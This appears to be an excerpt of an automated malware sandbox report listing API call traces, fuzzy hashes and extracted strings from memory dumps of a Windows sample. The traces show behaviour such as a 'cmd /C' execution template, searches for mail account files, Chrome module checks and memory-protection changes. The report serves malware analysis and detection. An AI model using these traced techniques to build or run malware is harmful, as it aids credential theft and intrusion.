    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:FA37EB66B10EB030E777AF9420FFCE9A
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:66745
Initial sample SHA 256:856E8C8716FA5AFAC747EFCD8ACFE1488C703F1B8620DD567B2B7543458C5D69
Initial sample name:xxx.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
